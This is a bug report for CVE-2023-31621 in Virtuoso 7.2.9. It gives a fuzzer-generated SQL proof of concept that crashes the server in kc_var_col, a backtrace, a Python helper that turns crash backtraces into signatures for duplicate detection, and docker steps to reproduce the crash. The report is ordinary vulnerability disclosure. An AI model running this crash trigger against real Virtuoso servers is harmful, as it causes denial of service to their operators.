CVE-2023-31621: virtuoso 7.2.9 crashed at kc_var_col · Issue #1130 · openlink/virtuoso-opensource
An issue in the kc_var_col component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
The PoC is generated by my DBMS fuzzer.
```sql
CREATE TABLE brin_test(a INTEGER NOT NULL);
INSERT INTO brin_test (a) VALUES(5);
INSERT INTO brin_test (a) VALUES(5);
ALTER TABLE brin_test ADD c1 VARCHAR(20) NOT NULL ;
UPDATE brin_test SET a = a + 1 WHERE a = 5;
```
backtrace:
```text
#0 0x5cfed5 (kc_var_col+0x155)
#1 0x5f6cb6 (page_copy_col+0x666)
#2 0x5d6e62 (page_row_bm+0x782)
#3 0x5db6b0 (page_apply_1+0xb90)
#4 0x5dd8d9 (page_apply+0x119)
#5 0x86b517 (upd_refit_row+0x127)
#6 0x86ce54 (update_node_run_1+0xdf4)
#7 0x821736 (update_node_vec_run+0x836)
#8 0x86eaf2 (update_node_input+0x2b2)
#9 0x7ac43e (qn_input+0x3ce)
#10 0x7acb6f (qn_ts_send_output+0x23f)
#11 0x7b247e (table_source_input+0x16ee)
#12 0x7ac43e (qn_input+0x3ce)
#13 0x7ac8a6 (qn_send_output+0x236)
#14 0x81e26d (set_ctr_vec_input+0x94d)
#15 0x7ac43e (qn_input+0x3ce)
#16 0x7bee59 (qr_dml_array_exec+0x839)
#17 0x7cb872 (sf_sql_execute+0x15d2)
#18 0x7cbf4e (sf_sql_execute_w+0x17e)
#19 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#20 0xe1f01c (future_wrapper+0x3fc)
#21 0xe2691e (_thread_boot+0x11e)
#22 0x7f2e9644f609 (start_thread+0xd9)
#23 0x7f2e9621f133 (clone+0x43)
```
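Triage helper, added here as an example and not part of this issue or of the Virtuoso project: it parses the `#N 0xADDR (symbol+0xOFFSET)` frame format of the backtrace above and derives a symbol-only signature so that repeated fuzzer hits of the same crash site can be filed as one report. The list of noise frames and the five-frame signature depth are assumptions of this example.

```python
import re
from typing import List, Tuple

# Frame format used in the report: "#N 0xADDR (symbol+0xOFFSET)".
FRAME_RE = re.compile(r"#(\d+)\s+0x([0-9a-fA-F]+)\s+\(([^+)]+)\+0x([0-9a-fA-F]+)\)")

# Thread-pool and libc frames present on every Virtuoso worker stack (assumed
# list); they say nothing about the bug, so they are dropped before signing.
NOISE_FRAMES = {"clone", "start_thread", "_thread_boot", "future_wrapper"}

# The backtrace from the report above (copied from the issue, not constructed).
REPORTED_TRACE = (
    "#0 0x5cfed5 (kc_var_col+0x155) #1 0x5f6cb6 (page_copy_col+0x666) "
    "#2 0x5d6e62 (page_row_bm+0x782) #3 0x5db6b0 (page_apply_1+0xb90) "
    "#4 0x5dd8d9 (page_apply+0x119) #5 0x86b517 (upd_refit_row+0x127) "
    "#6 0x86ce54 (update_node_run_1+0xdf4) #7 0x821736 (update_node_vec_run+0x836) "
    "#8 0x86eaf2 (update_node_input+0x2b2) #9 0x7ac43e (qn_input+0x3ce) "
    "#10 0x7acb6f (qn_ts_send_output+0x23f) #11 0x7b247e (table_source_input+0x16ee) "
    "#12 0x7ac43e (qn_input+0x3ce) #13 0x7ac8a6 (qn_send_output+0x236) "
    "#14 0x81e26d (set_ctr_vec_input+0x94d) #15 0x7ac43e (qn_input+0x3ce) "
    "#16 0x7bee59 (qr_dml_array_exec+0x839) #17 0x7cb872 (sf_sql_execute+0x15d2) "
    "#18 0x7cbf4e (sf_sql_execute_w+0x17e) #19 0x7d4c0d (sf_sql_execute_wrapper+0x3d) "
    "#20 0xe1f01c (future_wrapper+0x3fc) #21 0xe2691e (_thread_boot+0x11e) "
    "#22 0x7f2e9644f609 (start_thread+0xd9) #23 0x7f2e9621f133 (clone+0x43)"
)

def parse_backtrace(text: str) -> List[Tuple[int, int, str, int]]:
    """Return (frame_no, address, symbol, offset) tuples, crash site first."""
    return sorted((int(n), int(addr, 16), sym, int(off, 16))
                  for n, addr, sym, off in FRAME_RE.findall(text))

def crash_signature(text: str, depth: int = 5) -> str:
    """Join the symbols of the top `depth` non-noise frames.
    Addresses and offsets are left out on purpose: the same bug reached from a
    differently linked build (or under ASLR) must still produce the same key."""
    symbols = [sym for _, _, sym, _ in parse_backtrace(text) if sym not in NOISE_FRAMES]
    return " <- ".join(symbols[:depth])

def same_crash(trace_a: str, trace_b: str, depth: int = 5) -> bool:
    """True when two fuzzer crashes should be filed as a single report."""
    return crash_signature(trace_a, depth) == crash_signature(trace_b, depth)
```

For this report the signature is `kc_var_col <- page_copy_col <- page_row_bm <- page_apply_1 <- page_apply`, which is a usable key for checking whether a later fuzzer finding is a duplicate of this issue.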
ways to reproduce (write the PoC to the file '/tmp/test.sql' first):
```bash
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait for the server to start
sleep 10
# check whether a simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
```